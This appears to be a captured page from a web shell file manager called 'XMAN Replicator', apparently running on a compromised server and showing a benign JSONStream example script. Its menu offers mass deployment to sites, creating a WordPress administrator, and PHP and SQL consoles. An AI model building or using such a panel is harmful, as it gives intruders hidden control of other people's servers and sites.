🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
lib
/
node_modules
/
npm
/
node_modules
/
JSONStream
/
examples
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:36
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:36
🔄
🗑️
🗑️📁
⬇️
🔒
all_docs.js
459 B
-rw-r--r--
2021-03-10 14:36
✏️
🔄
🗑️
⬇️
🔒
Edit: all_docs.js
var request = require('request') , JSONStream = require('JSONStream') , es = require('event-stream') var parser = JSONStream.parse(['rows', true]) //emit parts that match this path (any element of the rows array) , req = request({url: 'http://isaacs.couchone.com/registry/_all_docs'}) , logger = es.mapSync(function (data) { //create a stream that logs to stderr, console.error(data) return data }) req.pipe(parser) parser.pipe(logger)
Save
PHP Console
Execute
SQL Console
Execute